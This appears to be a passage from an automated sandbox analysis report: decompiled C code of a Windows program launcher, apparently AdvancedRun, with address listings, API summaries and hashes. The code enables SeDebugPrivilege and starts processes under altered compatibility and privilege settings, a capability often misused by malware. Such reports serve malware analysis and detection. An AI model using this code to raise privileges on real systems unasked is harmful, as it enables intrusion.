					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                                                                                                                  0x004022d5
                                                                                                                                                                  0x004022dd
                                                                                                                                                                  0x004022e7
                                                                                                                                                                  0x004022ec
                                                                                                                                                                  0x004022f7
                                                                                                                                                                  0x004022fa
                                                                                                                                                                  0x004022fd
                                                                                                                                                                  0x00402300
                                                                                                                                                                  0x00402307
                                                                                                                                                                  0x0040230d
                                                                                                                                                                  0x0040230e
                                                                                                                                                                  0x00402318
                                                                                                                                                                  0x00402321
                                                                                                                                                                  0x00402324
                                                                                                                                                                  0x00402327
                                                                                                                                                                  0x0040232a
                                                                                                                                                                  0x0040232d
                                                                                                                                                                  0x00402334
                                                                                                                                                                  0x00402337
                                                                                                                                                                  0x0040233e
                                                                                                                                                                  0x0040234f
                                                                                                                                                                  0x00402356
                                                                                                                                                                  0x0040235b
                                                                                                                                                                  0x0040235e
                                                                                                                                                                  0x0040236d
                                                                                                                                                                  0x00402374
                                                                                                                                                                  0x0040237e
                                                                                                                                                                  0x00402395
                                                                                                                                                                  0x004023a0
                                                                                                                                                                  0x004023a0
                                                                                                                                                                  0x004023ac
                                                                                                                                                                  0x004023cf
                                                                                                                                                                  0x004023d2
                                                                                                                                                                  0x004023d9
                                                                                                                                                                  0x004023de
                                                                                                                                                                  0x004023f6
                                                                                                                                                                  0x00402403
                                                                                                                                                                  0x00402414
                                                                                                                                                                  0x00402419
                                                                                                                                                                  0x00402403
                                                                                                                                                                  0x0040241a
                                                                                                                                                                  0x00402423
                                                                                                                                                                  0x00402458
                                                                                                                                                                  0x0040245d
                                                                                                                                                                  0x00402464
                                                                                                                                                                  0x00402467
                                                                                                                                                                  0x00402468
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402425
                                                                                                                                                                  0x00402428
                                                                                                                                                                  0x0040242b
                                                                                                                                                                  0x00402433
                                                                                                                                                                  0x00402434
                                                                                                                                                                  0x00402473
                                                                                                                                                                  0x00402473
                                                                                                                                                                  0x0040247c
                                                                                                                                                                  0x00402481
                                                                                                                                                                  0x00402488
                                                                                                                                                                  0x00402488
                                                                                                                                                                  0x00402495
                                                                                                                                                                  0x0040249a
                                                                                                                                                                  0x004024b7
                                                                                                                                                                  0x004024be
                                                                                                                                                                  0x004024cd
                                                                                                                                                                  0x004024d1
                                                                                                                                                                  0x004024ed
                                                                                                                                                                  0x004024f0
                                                                                                                                                                  0x00402506
                                                                                                                                                                  0x0040250b
                                                                                                                                                                  0x00402512
                                                                                                                                                                  0x00402518
                                                                                                                                                                  0x00402519
                                                                                                                                                                  0x0040251e
                                                                                                                                                                  0x00402524
                                                                                                                                                                  0x00402527
                                                                                                                                                                  0x0040252b
                                                                                                                                                                  0x00402530
                                                                                                                                                                  0x00402531
                                                                                                                                                                  0x00402531
                                                                                                                                                                  0x0040253d
                                                                                                                                                                  0x0040255a
                                                                                                                                                                  0x00402561
                                                                                                                                                                  0x00402570
                                                                                                                                                                  0x00402574
                                                                                                                                                                  0x00402590
                                                                                                                                                                  0x00402593
                                                                                                                                                                  0x004025a9
                                                                                                                                                                  0x004025ae
                                                                                                                                                                  0x004025b5
                                                                                                                                                                  0x004025bb
                                                                                                                                                                  0x004025bc
                                                                                                                                                                  0x004025c1
                                                                                                                                                                  0x004025c7
                                                                                                                                                                  0x004025ca
                                                                                                                                                                  0x004025cd
                                                                                                                                                                  0x004025ce
                                                                                                                                                                  0x004025d4
                                                                                                                                                                  0x004025d4
                                                                                                                                                                  0x004025da
                                                                                                                                                                  0x004025e3
                                                                                                                                                                  0x004025eb
                                                                                                                                                                  0x00402633
                                                                                                                                                                  0x004025fb
                                                                                                                                                                  0x00402608
                                                                                                                                                                  0x0040260f
                                                                                                                                                                  0x00402614
                                                                                                                                                                  0x00402624
                                                                                                                                                                  0x00402630
                                                                                                                                                                  0x00402630
                                                                                                                                                                  0x0040263a
                                                                                                                                                                  0x0040263b
                                                                                                                                                                  0x00402646
                                                                                                                                                                  0x0040264b
                                                                                                                                                                  0x0040264c
                                                                                                                                                                  0x0040265a
                                                                                                                                                                  0x0040265a
                                                                                                                                                                  0x0040265d
                                                                                                                                                                  0x00402666
                                                                                                                                                                  0x00402668
                                                                                                                                                                  0x00402668
                                                                                                                                                                  0x00402672
                                                                                                                                                                  0x00402675
                                                                                                                                                                  0x0040267e
                                                                                                                                                                  0x0040267e
                                                                                                                                                                  0x00402683
                                                                                                                                                                  0x0040268b
                                                                                                                                                                  0x0040269e
                                                                                                                                                                  0x0040269e
                                                                                                                                                                  0x004026a3
                                                                                                                                                                  0x004026ac
                                                                                                                                                                  0x004026b5
                                                                                                                                                                  0x004026b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ae
                                                                                                                                                                  0x004026ae
                                                                                                                                                                  0x004026bf
                                                                                                                                                                  0x004026c1
                                                                                                                                                                  0x004026c6
                                                                                                                                                                  0x004026cc
                                                                                                                                                                  0x004026d5
                                                                                                                                                                  0x004026db
                                                                                                                                                                  0x004026e4
                                                                                                                                                                  0x004026ea
                                                                                                                                                                  0x004026f3
                                                                                                                                                                  0x004026f9
                                                                                                                                                                  0x00402707
                                                                                                                                                                  0x00402707
                                                                                                                                                                  0x0040270d
                                                                                                                                                                  0x00402710
                                                                                                                                                                  0x0040276d
                                                                                                                                                                  0x00402770
                                                                                                                                                                  0x0040280b
                                                                                                                                                                  0x0040280e
                                                                                                                                                                  0x00402813
                                                                                                                                                                  0x00402810
                                                                                                                                                                  0x00402810
                                                                                                                                                                  0x00402810
                                                                                                                                                                  0x00402819
                                                                                                                                                                  0x0040281f
                                                                                                                                                                  0x00402836
                                                                                                                                                                  0x00402841
                                                                                                                                                                  0x00402846
                                                                                                                                                                  0x0040284a
                                                                                                                                                                  0x00402851
                                                                                                                                                                  0x00402857
                                                                                                                                                                  0x00402860
                                                                                                                                                                  0x00402865
                                                                                                                                                                  0x00402876
                                                                                                                                                                  0x00402879
                                                                                                                                                                  0x00402888
                                                                                                                                                                  0x00402888
                                                                                                                                                                  0x00402857
                                                                                                                                                                  0x00402891
                                                                                                                                                                  0x0040289c
                                                                                                                                                                  0x0040289c
                                                                                                                                                                  0x00402779
                                                                                                                                                                  0x00402784
                                                                                                                                                                  0x0040278d
                                                                                                                                                                  0x004027a4
                                                                                                                                                                  0x004027b3
                                                                                                                                                                  0x004027b8
                                                                                                                                                                  0x004027bb
                                                                                                                                                                  0x004027bf
                                                                                                                                                                  0x004027c6
                                                                                                                                                                  0x004027c6
                                                                                                                                                                  0x004027d1
                                                                                                                                                                  0x004027d6
                                                                                                                                                                  0x004027d9
                                                                                                                                                                  0x004027db
                                                                                                                                                                  0x004027e2
                                                                                                                                                                  0x004027e4
                                                                                                                                                                  0x004027e4
                                                                                                                                                                  0x004027e7
                                                                                                                                                                  0x004027f4
                                                                                                                                                                  0x004027fc
                                                                                                                                                                  0x00402801
                                                                                                                                                                  0x00402801
                                                                                                                                                                  0x00402803
                                                                                                                                                                  0x00402803
                                                                                                                                                                  0x00402806
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402806
                                                                                                                                                                  0x00402715
                                                                                                                                                                  0x00402729
                                                                                                                                                                  0x0040272e
                                                                                                                                                                  0x00402731
                                                                                                                                                                  0x00402738
                                                                                                                                                                  0x00402738
                                                                                                                                                                  0x00402743
                                                                                                                                                                  0x00402748
                                                                                                                                                                  0x0040274d
                                                                                                                                                                  0x00402754
                                                                                                                                                                  0x00402756
                                                                                                                                                                  0x00402756
                                                                                                                                                                  0x00402759
                                                                                                                                                                  0x00402763
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402763
                                                                                                                                                                  0x004026fb
                                                                                                                                                                  0x00402700
                                                                                                                                                                  0x00402702
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402702
                                                                                                                                                                  0x004026ec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ec
                                                                                                                                                                  0x004026dd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026dd
                                                                                                                                                                  0x004026ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004026ce
                                                                                                                                                                  0x004026ac
                                                                                                                                                                  0x00402443
                                                                                                                                                                  0x0040246a
                                                                                                                                                                  0x00402470
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402470

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00402300
                                                                                                                                                                  • memset.MSVCRT ref: 0040233E
                                                                                                                                                                  • memset.MSVCRT ref: 00402356
                                                                                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                  • wcschr.MSVCRT ref: 00402387
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                                                                                                                  • memset.MSVCRT ref: 004023D9
                                                                                                                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                                                                  • memset.MSVCRT ref: 004024BE
                                                                                                                                                                  • memset.MSVCRT ref: 004024D1
                                                                                                                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                                                                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                                                                                                                  • memset.MSVCRT ref: 00402561
                                                                                                                                                                  • memset.MSVCRT ref: 00402574
                                                                                                                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                                                                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                                                                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                                                                                                                  • memset.MSVCRT ref: 0040260F
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                                                                  • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                                                                  • API String ID: 2452314994-435178042
                                                                                                                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t154;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12); // executed
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                                                                                                  0x00408533
                                                                                                                                                                  0x00408533
                                                                                                                                                                  0x00408536
                                                                                                                                                                  0x0040853e
                                                                                                                                                                  0x00408546
                                                                                                                                                                  0x0040854d
                                                                                                                                                                  0x00408559
                                                                                                                                                                  0x00408563
                                                                                                                                                                  0x00408569
                                                                                                                                                                  0x00408572
                                                                                                                                                                  0x00408583
                                                                                                                                                                  0x0040858d
                                                                                                                                                                  0x00408595
                                                                                                                                                                  0x0040859e
                                                                                                                                                                  0x004085a2
                                                                                                                                                                  0x004085a6
                                                                                                                                                                  0x004085aa
                                                                                                                                                                  0x004085ae
                                                                                                                                                                  0x004085b8
                                                                                                                                                                  0x004085c1
                                                                                                                                                                  0x004085c8
                                                                                                                                                                  0x004085cd
                                                                                                                                                                  0x004085cf
                                                                                                                                                                  0x0040867f
                                                                                                                                                                  0x00408688
                                                                                                                                                                  0x0040868d
                                                                                                                                                                  0x0040868f
                                                                                                                                                                  0x00408730
                                                                                                                                                                  0x00408735
                                                                                                                                                                  0x00408737
                                                                                                                                                                  0x0040873d
                                                                                                                                                                  0x00408750
                                                                                                                                                                  0x0040875d
                                                                                                                                                                  0x00408763
                                                                                                                                                                  0x00408770
                                                                                                                                                                  0x00408775
                                                                                                                                                                  0x00408779
                                                                                                                                                                  0x0040878b
                                                                                                                                                                  0x00408790
                                                                                                                                                                  0x004087a2
                                                                                                                                                                  0x004087aa
                                                                                                                                                                  0x004087b8
                                                                                                                                                                  0x004087be
                                                                                                                                                                  0x004087c3
                                                                                                                                                                  0x004087c9
                                                                                                                                                                  0x004087d2
                                                                                                                                                                  0x004087df
                                                                                                                                                                  0x004087e3
                                                                                                                                                                  0x004087e6
                                                                                                                                                                  0x00408801
                                                                                                                                                                  0x004087e8
                                                                                                                                                                  0x004087f8
                                                                                                                                                                  0x004087fe
                                                                                                                                                                  0x00408811
                                                                                                                                                                  0x00408816
                                                                                                                                                                  0x00408816
                                                                                                                                                                  0x0040881c
                                                                                                                                                                  0x00408822
                                                                                                                                                                  0x00408779
                                                                                                                                                                  0x00408824
                                                                                                                                                                  0x00408829
                                                                                                                                                                  0x00408833
                                                                                                                                                                  0x00408834
                                                                                                                                                                  0x00408840
                                                                                                                                                                  0x00408848
                                                                                                                                                                  0x0040884c
                                                                                                                                                                  0x00408850
                                                                                                                                                                  0x00408855
                                                                                                                                                                  0x0040885a
                                                                                                                                                                  0x00408860
                                                                                                                                                                  0x004088ac
                                                                                                                                                                  0x004088b1
                                                                                                                                                                  0x004088b3
                                                                                                                                                                  0x004088bf
                                                                                                                                                                  0x004088c5
                                                                                                                                                                  0x004088cb
                                                                                                                                                                  0x004088da
                                                                                                                                                                  0x004088ea
                                                                                                                                                                  0x004088ed
                                                                                                                                                                  0x004088f8
                                                                                                                                                                  0x004088ff
                                                                                                                                                                  0x00408905
                                                                                                                                                                  0x004088b5
                                                                                                                                                                  0x004088b5
                                                                                                                                                                  0x004088b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408862
                                                                                                                                                                  0x00408862
                                                                                                                                                                  0x0040886d
                                                                                                                                                                  0x00408874
                                                                                                                                                                  0x0040887b
                                                                                                                                                                  0x00408882
                                                                                                                                                                  0x00408889
                                                                                                                                                                  0x00408895
                                                                                                                                                                  0x00408897
                                                                                                                                                                  0x00408658
                                                                                                                                                                  0x00408658
                                                                                                                                                                  0x0040865d
                                                                                                                                                                  0x00408661
                                                                                                                                                                  0x0040866a
                                                                                                                                                                  0x00408673
                                                                                                                                                                  0x00408678
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408678
                                                                                                                                                                  0x00408860
                                                                                                                                                                  0x00408695
                                                                                                                                                                  0x00408695
                                                                                                                                                                  0x0040869f
                                                                                                                                                                  0x004086a2
                                                                                                                                                                  0x004086af
                                                                                                                                                                  0x004086a4
                                                                                                                                                                  0x004086a7
                                                                                                                                                                  0x004086a7
                                                                                                                                                                  0x004086b4
                                                                                                                                                                  0x004086bf
                                                                                                                                                                  0x004086cb
                                                                                                                                                                  0x004086d3
                                                                                                                                                                  0x004086d7
                                                                                                                                                                  0x004086db
                                                                                                                                                                  0x004086e0
                                                                                                                                                                  0x004086f1
                                                                                                                                                                  0x004086f8
                                                                                                                                                                  0x004086ff
                                                                                                                                                                  0x00408706
                                                                                                                                                                  0x0040870d
                                                                                                                                                                  0x00408719
                                                                                                                                                                  0x0040871b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040871b
                                                                                                                                                                  0x004085d5
                                                                                                                                                                  0x004085da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004085ec
                                                                                                                                                                  0x004085ef
                                                                                                                                                                  0x004085f6
                                                                                                                                                                  0x004085fd
                                                                                                                                                                  0x00408604
                                                                                                                                                                  0x0040860b
                                                                                                                                                                  0x00408612
                                                                                                                                                                  0x00408616
                                                                                                                                                                  0x00408620
                                                                                                                                                                  0x0040862a
                                                                                                                                                                  0x00408632
                                                                                                                                                                  0x00408633
                                                                                                                                                                  0x00408638
                                                                                                                                                                  0x0040864a
                                                                                                                                                                  0x0040864f
                                                                                                                                                                  0x00408651
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040854f
                                                                                                                                                                  0x0040854f
                                                                                                                                                                  0x00408550
                                                                                                                                                                  0x00408556
                                                                                                                                                                  0x00408556

                                                                                                                                                                  APIs
